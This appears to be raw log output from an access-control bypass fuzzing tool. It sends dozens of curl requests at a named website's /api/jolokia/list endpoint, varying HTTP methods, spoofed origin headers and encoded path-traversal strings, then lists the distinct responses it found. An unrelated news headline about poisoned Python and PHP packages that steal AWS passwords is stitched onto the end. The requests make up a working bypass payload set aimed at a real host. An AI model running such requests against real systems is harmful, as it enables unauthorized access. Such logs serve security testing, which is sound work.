2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
16: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xargs bat


Poisoned Python and PHP packages purloin passwords for AWS access

More supply chain trouble - this time with clear examples so you can learn how to spot this stuff yourself.
